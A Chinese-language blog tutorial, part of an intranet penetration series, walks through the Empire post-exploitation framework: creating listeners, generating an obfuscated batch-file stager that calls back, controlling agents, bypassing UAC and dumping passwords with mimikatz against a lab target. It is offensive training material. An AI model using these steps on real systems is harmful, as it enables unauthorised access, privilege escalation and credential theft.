內網滲透 day14-empire基礎命令的使用

彩虹猛獁發表於2020-11-14
empire的基礎操作

目錄

1. 建立監聽器

2. 設定stagers

3. 使用者互動

4. 提權

1. 建立監聽器

help    檢視幫助命令

wps1

listeners     檢視監聽器

wps2

uselistener  xxx     使用監聽器模組

常用的監聽模組:http

按兩次tab鍵檢視能使用的監聽器模組

wps3

wps4

info    檢視引數資訊

wps5

設定引數

set Name xxx

wps6

set Host http://xxx

wps7

set Port xxx

wps8

wps9

執行:execute

wps10

main 返回主選單

這邊顯示目前有一個活躍的監聽器

wps11

2. 設定stagers

usestagers xxx   使用stager模組

常用的模組:windows/hta、windows/launcher_bat

按兩次tab鍵檢視能使用的stager模組

wps12

wps13

info  檢視要設定的引數

wps14

set Listener xx     設定監聽器

wps15

set OutFile /var/www/html/launcher.bat 設定檔案生成路勁

wps16

delete   木馬執行完是否自動刪除

Obfuscate(混淆)

wps17

execute 執行

wps18

在靶機上雙擊bat檔案成功反彈會話

wps19

3. 使用者互動

agents 切換到使用者列表

wps20

list 列出使用者

wps21

rename 修改使用者ID的名字

wps22

interact 進入到使用者互動介面

wps23

sysinfo     檢視系統資訊

wps24

sc  截圖

wps25

wps26

searchmodule 搜尋模組

wps27

shell + command 執行命令

wps28

spawn 遷移到新的使用者需要指定監聽器的名字

wps29

wps30

產生了一個新的會話

wps31

使用者清除:

kill agents | all

wps32

監聽器清除:

kill listener | all

wps33

4. 提權

bypassuac  <listener>      bypassuac繞過uac提權

wps34

可以看到產生了一個帶*的會話,提權成功使用者名稱前面會多一個*號

wps35

mimikatz      在擁有許可權後可以利用mimikatz獲取使用者賬號密碼

wps36

creds         以列表的形式顯示mimikatz獲取的賬號密碼

wps37

uac提權(需要手動確認)

searchmodule ask 搜尋ask模組

wps38

usemodule privesc/ask       使用privesc/ask模組

wps39

info    檢視所需引數

wps40

設定監聽器

wps41

run   執行

wps42

靶機彈出uac認證框

wps43

列表中產生新的管理員會話

wps44

相關文章